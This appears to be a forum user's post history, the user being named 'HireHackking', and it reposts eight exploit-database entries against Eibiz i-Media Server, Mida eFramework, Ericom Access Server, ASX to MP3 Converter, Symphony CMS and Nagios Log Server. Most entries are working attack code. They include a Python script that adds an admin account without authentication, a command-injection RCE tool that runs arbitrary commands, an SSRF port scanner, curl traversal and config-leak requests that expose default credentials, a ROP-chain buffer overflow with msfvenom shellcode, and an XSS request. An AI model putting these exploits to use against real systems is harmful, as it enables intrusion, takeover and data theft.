
HireHackking


Everything posted by HireHackking

  1. # Exploit Title: Eibiz i-Media Server Digital Signage 3.8.0 - Authentication Bypass # Date: 2020-08-21 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.eibiz.co.th # Version: <=3.8.0 # CVE: N/A #!/usr/bin/env python3 # -*- coding: utf-8 -*- # # # Eibiz i-Media Server Digital Signage 3.8.0 (createUser) Authentication Bypass (Add Admin) # # # Vendor: EIBIZ Co.,Ltd. # Product web page: http://www.eibiz.co.th # Affected version: <=3.8.0 # # Summary: EIBIZ develop advertising platform for out of home media in that # time the world called "Digital Signage". Because most business customers # still need get outside to get in touch which products and services. Online # media alone cannot serve them right place, right time. # # Desc: The application suffers from unauthenticated privilege escalation and # arbitrary user creation vulnerability that allows authentication bypass. # Once serialized, an AMF encoded object graph may be used to persist and retrieve # application state or allow two endpoints to communicate through the exchange # of strongly typed data. These objects are received by the server without validation # and authentication and gives the attacker the ability to create any user with # any role and bypass the security control in place and modify presented data on # the screen/billboard. # # ========================================================================================= # # # python3 imedia_createUser.py 192.168.1.1 waddup # # --Sending serialized object... # --Replaying... # # ------------------------------------------------------ # Admin user 'waddup' successfully created. No password. 
# ------------------------------------------------------ # # ========================================================================================= # # Tested on: Windows Server 2016 # Windows Server 2012 R2 # Windows Server 2008 R2 # Apache Flex # Apache Tomcat/6.0.14 # Apache-Coyote/1.1 # BlazeDS Application # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2020-5586 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5586.php # # # 26.07.2020 # # import time as go import requests import sys import re class __CreateAdmin__: def __init__(self): self.ep = "/messagebroker/amf" self.agent = "CharlieChaplin" self.amfpacket = None self.bytecount = None self.bytesdata = None self.address = None self.headers = None self.usrname = None self.ende = None def usage(self): if len(sys.argv) != 3: self.me() msg = "\x20i-Media Server Digital Signage 3.8.0 Auth Bypass/Add Admin" brd = "-" * len(msg + "\x20") print("\n" + brd) print(msg) print("\x20Usage: ./i-media.py [ip] [username]") print(brd) exit(12) else: self.address = sys.argv[1] self.usrname = sys.argv[2] if not "http" in self.address: self.address = "http://{}".format(self.address) def amf(self): self.headers = {"User-Agent" : self.agent, "Accept" : "*/*", "Accept-Language" : "en-US,en;q=0.5", "Accept-Encoding" : "gzip, deflate", "Origin" : self.address, "Connection" : "close", "Referer" : self.address + "/main.swf", "Content-Type" : "application/x-amf"} self.amfpacket = b"\x00\x03\x00\x00\x00\x01\x00\x04\x6E" self.amfpacket += b"\x75\x6C\x6C\x00\x03\x2F\x33\x36\x00" self.amfpacket += b"\x00\x01\xB3\x0A\x00\x00\x00\x01\x11" self.amfpacket += b"\x0A\x81\x13\x4F\x66\x6C\x65\x78\x2E" self.amfpacket += b"\x6D\x65\x73\x73\x61\x67\x69\x6E\x67" self.amfpacket += b"\x2E\x6D\x65\x73\x73\x61\x67\x65\x73" self.amfpacket += b"\x2E\x52\x65\x6D\x6F\x74\x69\x6E\x67" self.amfpacket += b"\x4D\x65\x73\x73\x61\x67\x65\x0D\x73" self.amfpacket += 
b"\x6F\x75\x72\x63\x65\x13\x6F\x70\x65" self.amfpacket += b"\x72\x61\x74\x69\x6F\x6E\x13\x74\x69" self.amfpacket += b"\x6D\x65\x73\x74\x61\x6D\x70\x09\x62" self.amfpacket += b"\x6F\x64\x79\x11\x63\x6C\x69\x65\x6E" self.amfpacket += b"\x74\x49\x64\x0F\x68\x65\x61\x64\x65" self.amfpacket += b"\x72\x73\x15\x74\x69\x6D\x65\x54\x6F" self.amfpacket += b"\x4C\x69\x76\x65\x17\x64\x65\x73\x74" self.amfpacket += b"\x69\x6E\x61\x74\x69\x6F\x6E\x13\x6D" self.amfpacket += b"\x65\x73\x73\x61\x67\x65\x49\x64\x01" self.amfpacket += b"\x06\x15\x63\x72\x65\x61\x74\x65\x55" self.amfpacket += b"\x73\x65\x72\x04\x00\x09\x03\x01\x0A" self.amfpacket += b"\x81\x73\x1B\x64\x73\x2E\x6D\x6F\x64" self.amfpacket += b"\x65\x6C\x2E\x55\x73\x65\x72\x11\x70" self.amfpacket += b"\x61\x73\x73\x77\x6F\x72\x64\x0D\x63" self.amfpacket += b"\x72\x65\x61\x74\x65\x07\x74\x65\x6C" self.amfpacket += b"\x07\x66\x61\x78\x09\x6E\x61\x6D\x65" self.amfpacket += b"\x0F\x61\x64\x64\x72\x65\x73\x73\x0D" self.amfpacket += b"\x75\x70\x64\x61\x74\x65\x05\x69\x64" self.amfpacket += b"\x0D\x6D\x6F\x62\x69\x6C\x65\x0F\x75" self.amfpacket += b"\x44\x65\x6C\x65\x74\x65\x15\x64\x65" self.amfpacket += b"\x70\x61\x72\x74\x6D\x65\x6E\x74\x09" self.amfpacket += b"\x72\x6F\x6C\x65\x09\x72\x65\x61\x64" self.amfpacket += b"\x0B\x65\x6D\x61\x69\x6C\x0F\x63\x6F" self.amfpacket += b"\x6D\x70\x61\x6E\x79\x06\x01\x03\x06" self.amfpacket += b"\x01\x06\x01\x06" ##################" self.bytecount = len(self.usrname * 2) + 1 self.bytesdata = [self.bytecount] self.amfpacket += "".join(map(chr, self.bytesdata)) self.amfpacket += (bytes(self.usrname.encode("utf-8"))) self.amfpacket += b"\x06\x01\x03\x06\x36\x06\x01\x03\x06" self.amfpacket += b"\x01\x06\x1B\x41\x64\x6D\x69\x6E\x69" self.amfpacket += b"\x73\x74\x72\x61\x74\x6F\x72\x03\x06" self.amfpacket += b"\x01\x06\x01\x01\x0A\x0B\x01\x15\x44" self.amfpacket += b"\x53\x45\x6E\x64\x70\x6F\x69\x6E\x74" self.amfpacket += b"\x06\x0D\x6D\x79\x2D\x61\x6D\x66\x09" self.amfpacket += 
b"\x44\x53\x49\x64\x06\x49\x39\x36\x42" self.amfpacket += b"\x30\x42\x46\x38\x43\x2D\x41\x31\x31" self.amfpacket += b"\x41\x2D\x38\x41\x32\x34\x2D\x38\x31" self.amfpacket += b"\x43\x31\x2D\x35\x38\x37\x45\x41\x33" self.amfpacket += b"\x41\x43\x41\x33\x38\x43\x01\x04\x00" self.amfpacket += b"\x06\x17\x75\x73\x65\x72\x53\x65\x72" self.amfpacket += b"\x76\x69\x63\x65\x06\x49\x39\x39\x46" self.amfpacket += b"\x45\x43\x43\x46\x39\x2D\x34\x41\x38" self.amfpacket += b"\x44\x2D\x46\x46\x34\x31\x2D\x31\x41" self.amfpacket += b"\x36\x36\x2D\x42\x46\x39\x31\x32\x45" self.amfpacket += b"\x42\x42\x44\x36\x35\x36" ##########" print("\n--Sending serialized object...") req = requests.post(self.address + self.ep, headers=self.headers, data=self.amfpacket) #print(req.text.encode("utf-8")) go.sleep(2) print("--Replaying...") req = requests.post(self.address + self.ep, headers=self.headers, data=self.amfpacket) #print(req.text.encode("utf-8")) self.ende = "Admin user '" + self.usrname + "' successfully created. No password." print print("-" * len(self.ende)) print(self.ende) print("-" * len(self.ende)) def me(self): cc = """ /`,.,,,. :.......,, ,.........7 ,.........$ ......:=+=$ I.....,,:~,.: $.?7IZDDNNN~. $$: 8D=:I D, D~,7NI7DNN DDD NNN: D8.ININ; D8?7DZS .ZDNNND D S..,.~8?,N OO77 N......,..$=77:+?=~8 :......,::=.I8?:+=.=+~++ =.......,:+$=+O:+==~~++++= 8...........~7D$::~..~====:++ I.............:+.....~~~=~:~+? N,............. .+...,:~=+~~ :+=$ ;....... ......, .,....,:=+:,..~=? Z,,...... :............,::~~=...===I =.......$ Z...... =~,,,,.,:~,...,7~= +....... 8.....,.=~~~:.~~~=:~ ..:$== ,...... +,..,,:.=~:~+I:,+I=8:...=?~ ,....., =...,,,8+=,:~=~I=~~ N...:+? ,.,.,.8 ,..,.,?DN~+~:=+::?D ..:=? 8...... ,...7=Z$DN:?::=I~~$ =..,=+ ...,..D ,....O88D,8D,:=:==+?? ...,:7 ,....7 ,..:$Z8D8=8DZ~~=~+==? :..:~+ ......8D .. .... :?~8D:.:~~=++ ..,~II :....~D+: . . . ..,..==~===N +,.,=$ ,. DDND.......... .,...,===+=N ..,+?Z DD 88 .......... ....,..~+=~N ..,~?I ....... ,,.,,.:...=?? 8..~=I$ ....... 
...,,,,. ,:~= ..:=~? ........ ,.,,..,:.. I.:+?+D ....... .......,:,,8 ,..IN ........ .,.. ..,,:.: :8N ........ ... ..,::,, I+O ........ ......,:,. O.ZN ........ . . ...,,,,. D+ ............ ....,,,. = ....... . ....,,, ? ....... .....,,, 7 ...... . ..,,,, + :..... ..,.,, 8 :....... =. .....,,,N 8 ~....... D. .....,,,D 8 ~....... D. . ...,,,O D =.... .....,,Z ?` +...... . :........,.$ + I...... ........,.7 = Z........ . . ....,,7 D N..... ... . ........I 8 ..... ... , ........I 8 ...... . = .. .....I 7 :.. . ..7 8... .....I ? Z.. D .. ....7 N NND88OOOOOOO88DN O.. . .. ....O O D8OZ$77II777$$ZO8DN ... . .. . .....N NNNNDDD+D888OOZ$7IIIIII7$ZO8DDN .,. ....O O.. ..88OOZZ$$777~777IIIIIIIIIIIIIII77$Z8N $.. ...88.. ..:ZZZZ$77IIII,IIIIIIIIII77777IIII7ZODN ... ... ,7777IIIIIIII,IIIIII77$O88OZ7III7Z8N Z.. ~7. . ,IIIIIIIIIIIII,IIII7$O8DN NDO$77$Z8N =.. .. . 8. .IIIIIIIIIIIIII~I7$Z8DN NND88DDN ... .?, I777IIIIIIIII7$~O8N NNNNN 8.... .I. ...7IIIIII7$Z8DD NNNNN NND=....~,=~ ...+I . . ..I$$ZO8DN NN NNNNN N.+?~.~,=~=... ... $O.. . ...~:..=IINN $NNN ?,:..:,.=N I.....,,=I+ N8 ~....,8 """ j = 0 while j < len(cc): char = cc[j] sys.stdout.write(char) go.sleep(10.0 / 100000.0) j = j + 1 def main(self): self.usage() self.amf() if __name__ == '__main__': __CreateAdmin__().main()
  2. # Exploit Title: Mida eFramework 2.9.0 - Remote Code Execution # Google Dork: Server: Mida eFramework # Date: 2020-08-27 # Exploit Author: elbae # Vendor Homepage: https://www.midasolutions.com/ # Software Link: http://ova-efw.midasolutions.com/ # Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html # Version: <= 2.9.0 # CVE : CVE-2020-15920 #! /usr/bin/python3 # -*- coding: utf-8 -*- import argparse import requests import subprocess from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) def print_disclaimer(): print(""" --------------------- Disclaimer: 1) For testing purpose only. 2) Do not attack production environments. 3) Intended for educational purposes only and cannot be used for law violation or personal gain. 4) The author is not responsible for any possible harm caused by this material. ---------------------""") def print_info(): print(""" [*] PoC exploit for Mida eFramework <= 2.9.0 PDC (CVE-2020-15920) [*] Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html [*] Vulnerability: OS Command Injection Remote Code Execution Vulnerability (RCE) in PDC/ajaxreq.php Version\t< 2.9.0\t./CVE-2020-15920 http://192.168.1.60:8090/PDC/ajaxreq.php id Version\t2.9.0\t./CVE-2020-15920 https://192.168.1.60/PDC/ajaxreq.php id """) def pwn(url,cmd): running = """ [*] Target URL: {0} [*] Command: {1} """ print(running.format(url,cmd)) data = { "DIAGNOSIS":"PING", "PARAM":"127.0.0.1 -c 0; {0}".format(cmd) } r = requests.post(url,data=data,verify=False) line = "[*]"+"-"*20+" Output " + "-" *20 +"[*]" pretty_output = r.text.replace('<br>','\n') print(line+"\n{0}\n".format(pretty_output)+line) def main(): print_info() print_disclaimer() parser = argparse.ArgumentParser() parser.add_argument("target", type=str, help="the complete target URL") parser.add_argument("cmd", type=str, help="the command you want to run") args = parser.parse_args() 
pwn(args.target, args.cmd) if __name__ == '__main__': main()
  3. # Exploit Title: Eibiz i-Media Server Digital Signage 3.8.0 - Directory Traversal # Date: 2020-08-22 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.eibiz.co.th # Affected version: <=3.8.0 # CVE: N/A Eibiz i-Media Server Digital Signage 3.8.0 (oldfile) File Path Traversal Vendor: EIBIZ Co.,Ltd. Product web page: http://www.eibiz.co.th Affected version: <=3.8.0 Summary: EIBIZ develop advertising platform for out of home media in that time the world called "Digital Signage". Because most business customers still need get outside to get in touch which products and services. Online media alone cannot serve them right place, right time. Desc: i-Media Server is affected by a directory traversal vulnerability. An unauthenticated remote attacker can exploit this to view the contents of files located outside of the server's root directory. The issue can be triggered through the 'oldfile' GET parameter. Tested on: Windows Server 2016 Windows Server 2012 R2 Windows Server 2008 R2 Apache Flex Apache Tomcat/6.0.14 Apache-Coyote/1.1 BlazeDS Application Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5585 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5585.php 26.07.2020 -- $ curl "http://192.168.1.1/dlibrary/null?oldfile=../../WEB-INF/web.xml&library=null" $ curl "http://192.168.1.1/dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null" ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1
  4. # Exploit Title: Ericom Access Server x64 9.2.0 - Server-Side Request Forgery # Date: 2020-08-22 # Exploit Author: hyp3rlinx # Vendor Homepage: www.ericom.com # Version: Ericom Access Server x64 for (AccessNow & Ericom Blaze) v9.2.0 # CVE: CVE-2020-24548 [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/ERICOM-ACCESS-SERVER-ACCESS-NOW-BLAZE-9.2.0-SERVER-SIDE-REQUEST-FORGERY.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.ericom.com [Product] Ericom Access Server x64 for (AccessNow & Ericom Blaze) v9.2.0 AccessNow is an HTML5 remote desktop gateway that works from any device with an HTML5 compatible browser, including from Chromebooks and locked down devices. Ericom Blaze provides remote desktop connectivity from Mac, Windows and Linux devices to applications on office / home PCs and virtual desktops (VDI). [Vulnerability Type] Server Side Request Forgery [CVE Reference] CVE-2020-24548 [Security Issue] Ericom Access Server allows attackers to initiate SSRF requests making outbound connections to arbitrary hosts and TCP ports. Attackers, who can reach the AccessNow server can target internal systems that are behind firewalls that are typically not accessible. This can also be used to target third-party systems from the AccessNow server itself. The AccessNow server will return an attacker friendly response, exfiltrating which ports are listening for connections. This can bypass Firewall rules and undermine the integrity of other systems and security controls in place. E.g. listen using Netcat, Nc64.exe -llvp 25 A) Ericom Server 192.168.88.152 (defaults port 8080) B) Attacker 192.168.88.162 C) Victim 192.168.1.104 Using Wireshark we can observe A sends a SYN packet to C (port 25) C sends SYN/ACK to A A sends ACK to C. A sends ACK/FIN to C port 25. We will then get an AccessNow server response similar to below. 
["C","M",["Cannot connect to '192.168.1.104:25'.",true]] This message indicates we cannot connect and helpfully informs us of closed vs open ports. [Affected Component] Ericom Server port 8080 will forward connections to arbitrary Hosts and or Ports which are sent using Web-Socket requests. Ericom server then replies with a "Cannot connect to" message if a port is in a closed state. [Attack Vectors] Remote attackers can abuse the Ericom Access Server to conduct port scans on arbitrary systems. This is possible due to a server side request forgery vulnerability and using a remote TCP socket program. [Impact Information Disclosure] true [CVE Impact Other] Exfiltration of open ports [Exploit/POC] import sys,ssl import websocket ##pip install websocket-client #Required #By hyp3rlinx #ApparitionSec #======================================================== #Ericom Access Server v9.2.0 for (AccessNow & Blaze) SSRF #======================================================== BANNER=""" ______ _____ | ____| / ____| | |__ _ __ _ __ ___ _ __| | ___ _ __ ___ | __| | '__| '__/ _ \| '__| | / _ \| '_ ` _ \ | |____| | | | | (_) | | | |___| (_) | | | | | | |______|_| |_| \___/|_| \_____\___/|_| |_| |_| SSRF Exploit """ def ErrorCom(vs,vp,t,p): try: ws = websocket.create_connection("wss://"+vs+":"+vp+"/blaze/"+t+":"+p, sslopt={'cert_reqs': ssl.CERT_NONE}) ws.send("SSRF4U!") result = ws.recv() #print(result) if result.find("Cannot connect to")==-1: print("[+] Port "+p+" is open for business :)") else: print("[!] Port " + p+ " is closed :(") ws.close() except Exception as e: print(str(e)) if __name__=="__main__": if len(sys.argv) != 5: print(BANNER) print("[+] Ericom Access Server v9.2.0 - SSRF Exploit - CVE-2020-24548") print("[+] By Hyp3rlinX / ApparitionSec") print("[!] Usage: <vuln-server>,<port (usually 8080)>,<target>,<port-to-scan>") exit() if len(sys.argv[4]) > 5: print("[!] 
Port out of range") exit() print(BANNER) ErrorCom(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4]) [PoC Video URL] https://www.youtube.com/watch?v=oDTd-yRxVJ0 [Network Access] Remote [Severity] Medium [Disclosure Timeline] Vendor Notification : June 21, 2020 Received automated reply : June 21, 2020 Request for status : June 30, 2020 Vendor "Forwarded all the detail to our R&D and Management team" : June 30, 2020 Request for status : July 13, 2020 No vendor response Informed vendor advisory: August 11, 2020 Request for status : August 20, 2020 No vendor response August 22, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
  5. # Exploit Title: Eibiz i-Media Server Digital Signage 3.8.0 - Configuration Disclosure # Date: 2020-08-21 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.eibiz.co.th # Version: <=3.8.0 # CVE: N/A Eibiz i-Media Server Digital Signage 3.8.0 Configuration Disclosure Vendor: EIBIZ Co.,Ltd. Product web page: http://www.eibiz.co.th Affected version: <=3.8.0 Summary: EIBIZ develop advertising platform for out of home media in that time the world called "Digital Signage". Because most business customers still need get outside to get in touch which products and services. Online media alone cannot serve them right place, right time. Desc: i-Media Server is vulnerable to unauthenticated configuration disclosure when direct object reference is made to the SiteConfig.properties file using an HTTP GET method. This will enable the attacker to disclose sensitive information and help her in authentication bypass, privilege escalation and/or full system access. Tested on: Windows Server 2016 Windows Server 2012 R2 Windows Server 2008 R2 Apache Flex Apache Tomcat/6.0.14 Apache-Coyote/1.1 BlazeDS Application Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5583 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5583.php 26.07.2020 -- $ curl http://192.168.1.1/config/SiteConfig.properties server.mode=testing admin.username=admin admin.password=admin designer.username=designer designer.password=designer reporter.username=reporter reporter.password=reporter db.PriDBServerIp=127.0.0.1 db.PriDBServerPort=3306 db.PriDBServerUser=root db.PriDBServerPwd=eibiz1234 db.PriDBName=imediadb account.appId=1 account.RootPath=C:/iMediaServWeb/tomcat/webapps/ROOT/ account.ContentPath=C:/iMediaServWeb/tomcat/webapps/ROOT/ account.imediasuitURL=http://localhost:8080/UserAPI/v1/user/applogin account.ReportInteractive=0 account.ReportPlayer=1 account.ReportMedia=1 account.ReportTransfer=1 ConcurrentDownload=10 
BindingAddress=192.168.1.1 ServicePort=643 EndPointPort=644 AndroidServicePort=8080 AndroidEndPointPort=8081 RequireApprove= OutgoingMailServer= MailUser= MailPassword= mongodb.PriMongoDBName=imediadb_sandbox mongodb.PriMongoDBServerIp=localhost mongodb.PriMongoDBServerPort=27017 mongodb.PriMongoDBUser= mongodb.PriMongoDBPwd=
  6. # Exploit Title: ASX to MP3 converter 3.1.3.7.2010.11.05 - '.wax' Local Buffer Overflow (DEP,ASLR Bypass) (PoC) # Software Link Download: https://github.com/x00x00x00x00/ASXtoMP3Converter_3.1.3.7.2010.11.05/blob/master/ASXtoMP3Converter_3.1.3.7.2010.11.05.exe?raw=true # Exploit Author: Paras Bhatia # Discovery Date: 2020-08-25 # Vulnerable Software: ASX to MP3 converter # Version: 3.1.3.7.2010.11.05 # Vulnerability Type: Local Buffer Overflow # Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English) # Proof of Concept : # 1.- Run python code: asx_to_mp3_rop_exploit.py # 2.- Works on DEP enabled for ASX2MP3Converter.exe # 3.- Open "ASX2MP3Converter.exe" # 4.- Click on "Load" Button # 5.- Select generated file "asx_to_mp3_rop_exploit.wax". # 6.- Click on "Open". # 7.- Calc.exe runs. ################################################################################################################################################# #Python "asx_to_mp3_rop_exploit.py" Code: import struct file = 'asx_to_mp3_rop_exploit.wax' payload = "http://" payload += "A" * 17417 + struct.pack('<L', 0x10010C8A) + "CCCC" ## msfvenom -a x86 -p windows/exec cmd=calc -b "\x00\x0a\x09" -f python buf = "" buf += "\xbe\x4b\xe7\x94\x8c\xdb\xcd\xd9\x74\x24\xf4\x5a\x33" buf += "\xc9\xb1\x30\x31\x72\x13\x03\x72\x13\x83\xea\xb7\x05" buf += "\x61\x70\xaf\x48\x8a\x89\x2f\x2d\x02\x6c\x1e\x6d\x70" buf += "\xe4\x30\x5d\xf2\xa8\xbc\x16\x56\x59\x37\x5a\x7f\x6e" buf += "\xf0\xd1\x59\x41\x01\x49\x99\xc0\x81\x90\xce\x22\xb8" buf += "\x5a\x03\x22\xfd\x87\xee\x76\x56\xc3\x5d\x67\xd3\x99" buf += "\x5d\x0c\xaf\x0c\xe6\xf1\x67\x2e\xc7\xa7\xfc\x69\xc7" buf += "\x46\xd1\x01\x4e\x51\x36\x2f\x18\xea\x8c\xdb\x9b\x3a" buf += "\xdd\x24\x37\x03\xd2\xd6\x49\x43\xd4\x08\x3c\xbd\x27" buf += "\xb4\x47\x7a\x5a\x62\xcd\x99\xfc\xe1\x75\x46\xfd\x26" buf += "\xe3\x0d\xf1\x83\x67\x49\x15\x15\xab\xe1\x21\x9e\x4a" buf += "\x26\xa0\xe4\x68\xe2\xe9\xbf\x11\xb3\x57\x11\x2d\xa3" buf += 
"\x38\xce\x8b\xaf\xd4\x1b\xa6\xed\xb2\xda\x34\x88\xf0" buf += "\xdd\x46\x93\xa4\xb5\x77\x18\x2b\xc1\x87\xcb\x08\x3d" buf += "\xc2\x56\x38\xd6\x8b\x02\x79\xbb\x2b\xf9\xbd\xc2\xaf" buf += "\x08\x3d\x31\xaf\x78\x38\x7d\x77\x90\x30\xee\x12\x96" buf += "\xe7\x0f\x37\xf5\x66\x9c\xdb\xfa" ## Save allocation type (0x1000) in EDX payload += struct.pack('<L', 0x10047F4D) # ADC EDX,ESI # POP ESI # RETN payload += struct.pack('<L', 0x11112112) payload += struct.pack('<L', 0x10029B8C) # XOR EDX,EDX # RETN payload += struct.pack('<L', 0x1002D493) # POP EDX # RETN payload += struct.pack('<L', 0xEEEEEEEE) payload += struct.pack('<L', 0x10047F4D) # ADC EDX,ESI # POP ESI # RETN payload += struct.pack('<L', 0x41414141) ## Save the address of VirtualAlloc() in ESI payload += struct.pack('<L', 0x1002fade) # POP EAX # RETN payload += struct.pack('<L', 0x1004f060) # ptr to &VirtualAlloc() payload += struct.pack('<L', 0x1003239f) # MOV EAX,DWORD PTR DS:[EAX] # RETN payload += struct.pack('<L', 0x10040754) # PUSH EAX # POP ESI # POP EBP # LEA EAX,DWORD PTR DS:[ECX+EAX+D] # POP EBX # RETN payload += struct.pack('<L', 0x41414141) payload += struct.pack('<L', 0x41414141) ## Save the size of the block in EBX payload += struct.pack('<L', 0x1004d881) # XOR EAX,EAX # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN payload += struct.pack('<L', 0x10034735) # PUSH EAX # ADD AL,5D # MOV EAX,1 # POP EBX # RETN ## Save the address of esp in EBP payload += struct.pack('<L', 0x10031c6c) # POP EBP # RETN 
payload += struct.pack('<L', 0x10012316) # ADD ESP,8 # RETN ##Save memory protection code (0x40) in ECX payload += struct.pack('<L',0x1002e16c) # POP ECX # RETN payload += struct.pack('<L',0xffffffff) payload += struct.pack('<L',0x10031ebe) # INC ECX # AND EAX,8 # RETN payload += struct.pack('<L',0x10031ebe) # INC ECX # AND EAX,8 # RETN payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN ## Save ROP-NOP in EDI payload += struct.pack('<L', 0x1002e346) # POP EDI # RETN payload += struct.pack('<L', 0x10010C8A) # RETN ## Set up the EAX register to contain the address of # PUSHAD #RETN and JMP to this address payload += struct.pack('<L', 0x1002E516) # POP EAX # RETN payload += struct.pack('<L', 0xA4E2F275) payload += struct.pack('<L', 0x1003efe2) # ADD EAX,5B5D5E5F # RETN payload += struct.pack('<L', 0x10040ce5) # PUSH EAX # RETN payload += "\x90" * 4 payload += struct.pack('<L', 0x1003df73) # & PUSH ESP # RETN payload += "\x90" * 20 payload += buf f = open(file,'w') f.write(payload) f.close()
  7. # Exploit Title: SymphonyCMS 3.0.0 - Persistent Cross-Site Scripting # Google Dork: "lepton cms" # Date: 2020-08-28 # Exploit Author: SunCSR (Sun* Cyber Security Research) # Vendor Homepage: https://www.getsymphony.com/ # Software Link: https://www.getsymphony.com/ # Version: 3.0.0 # Tested on: Windows # CVE : N/A Description: Cross-site scripting (XSS) vulnerabilities in Symphony CMS 3.0.0 allow remote attackers to inject arbitrary web script or HTML To Reproduce: Steps to reproduce the behavior: 1. Login as member 2. Go to 'Articles' 3. Submit malicious content 4. Anyone (including admin) views the article and the XSS is executed Expected behavior When an admin or user views the content, a pop-up will be displayed Affected components: events\event.publish_article.php in Symphony CMS 3.0.0 allows XSS via fields['body'] to appendSubheading POC: POST /symphonycms/symphony/publish/articles/new/ HTTP/1.1 Host: target User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://target/symphonycms/symphony/publish/articles/new/ Content-Type: multipart/form-data; boundary=---------------------------17679481844164416353626544932 Content-Length: 1111 Origin: http://target Connection: close Cookie: PHPSESSID=b21qllug0g7ft80ueo3bn0bgcd; Upgrade-Insecure-Requests: 1 -----------------------------17679481844164416353626544932 Content-Disposition: form-data; name="xsrf" vr-i2mWs18DPjVmZ8z2nB-Gb3hdyrb -----------------------------17679481844164416353626544932 Content-Disposition: form-data; name="MAX_FILE_SIZE" 5242880 -----------------------------17679481844164416353626544932 Content-Disposition: form-data; name="fields[title]" TEST XSS -----------------------------17679481844164416353626544932 Content-Disposition: form-data; name="fields[body]" <script>alert('XSS')</script> 
  -----------------------------17679481844164416353626544932 Content-Disposition: form-data; name="fields[date]" 08/28/2020 5:55 am -----------------------------17679481844164416353626544932 Content-Disposition: form-data; name="fields[categories][]" 2 -----------------------------17679481844164416353626544932 Content-Disposition: form-data; name="fields[publish]" yes -----------------------------17679481844164416353626544932 Content-Disposition: form-data; name="action[save]" Create Entry -----------------------------17679481844164416353626544932-- Desktop (please complete the following information): OS: Windows 10 Browser: Firefox or Chrome Application: XAMPP, Burpsuite Additional context Tested on: 9.03.50 version POC at: https://vimeo.com/405740251
  8. # Exploit Title: Nagios Log Server 2.1.6 - Persistent Cross-Site Scripting # Date: 2020-08-07 # Vendor Homepage: https://www.nagios.com/products/nagios-log-server/ # Vendor Changelog: https://www.nagios.com/downloads/nagios-log-server/change-log/ # Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec) # Author Advisory: https://www.getastra.com/blog/911/stored-xss-vulnerability-nagios-log-server/ # Author Homepage: https://www.jinsonvarghese.com # Version: 2.1.6 and below # CVE : CVE-2020-16157 1. Description Nagios Log Server is a popular Centralized Log Management, Monitoring, and Analysis software that allows organizations to view, sort, and configure logs. Version 2.1.6 of the application was found to be vulnerable to Stored XSS. An attacker (in this case, an authenticated regular user) can use this vulnerability to execute malicious JavaScript aimed at stealing cookies, redirecting users, performing arbitrary actions on the victim’s (in this case, an admin’s) behalf, logging their keystrokes, and more. 2. Vulnerability The "Full Name" and "Username" fields in the /profile page or /admin/users/create page are vulnerable to Stored XSS. Once a payload is saved in one of these fields, navigate to the Alerting page (/alerts), create a new alert and select Email Users as the Notification Method. As the user list is shown, it can be seen that the payload gets executed. 3. Timeline Vulnerability reported to the Nagios team – July 08, 2020 Nagios Log Server 2.1.7 containing the fix to the vulnerability released – July 28, 2020
